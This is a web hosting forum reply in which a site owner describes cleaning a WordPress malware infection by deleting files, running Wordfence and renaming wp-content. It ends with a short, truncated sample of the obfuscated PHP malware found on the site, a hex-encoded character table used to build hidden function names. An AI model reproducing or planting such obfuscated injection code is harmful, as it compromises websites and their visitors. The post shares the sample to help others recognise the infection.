Web Hosting
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

WordPress fix Reply To: malicious code inject

Discussion in 'Misc WordPress Requests' started by yellofish, Oct 16, 2017.

  1. yellofish


    Reply To: malicious code inject, by yellofish

    I deleted quite a lot of PHP files with base64 script in it. I can see plenty of hits looking for exactly those files from various IPs. I also installed Wordfence and did a scan (it needed .htaccess modification due to LiteSpeed). I guess I am pretty OK for now.

    Another thing I did is renaming the /wp-content/ folder to something else. That will irritate the bots that look for certain plugins for a while (I hope).

    Below just some idea how one of those (non base64) look like:

    <?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['le87e270'] = "\x7d\x4a\x7a\x30\x41\x50\x52\x68\x4e\x66\x27\x44\x35\xd\x2b\x34\x4c\x67\x3f\x3a\x5e\x7b\x40\x5f\x39\x28\x48\x69\x4f\x5a\x3b\x76\x37\x2c\x24\x6c\x56\x29\x74\x58\x6a\x64\x4d\x4b\x75\x73\x3c\x36\x7e\x20\x49\x7c\x2e\x25\x2f\x63\x59\x38\x5d\x60\x46\x22\x2a\x45\x31\x78\x77\x5b\x72\x5c\x55\x32\x9\xa\x33\x3d\x65\x2d\x79\x54\x43\x6e\x23\x47\x6b\x42\x6d\x21\x61\x70\x53\x6f\x3e\x57\x51\x71\x62\x26";
    $GLOBALS[$GLOBALS['le87e270'][86].$GLOBALS['le87e270'][47].$GLOBALS['le87e270'][76].$GLOBALS['le87e270'][15].$GLOBALS['le87e270'][3].$GLOBALS['le87e270'][15]] = $GLOBALS['le87e270'][55].$GLOBALS['le87e270'][7].$GLOBALS['le87e270'][68];

    Reply To: malicious code inject

Share This Page

Web Hosting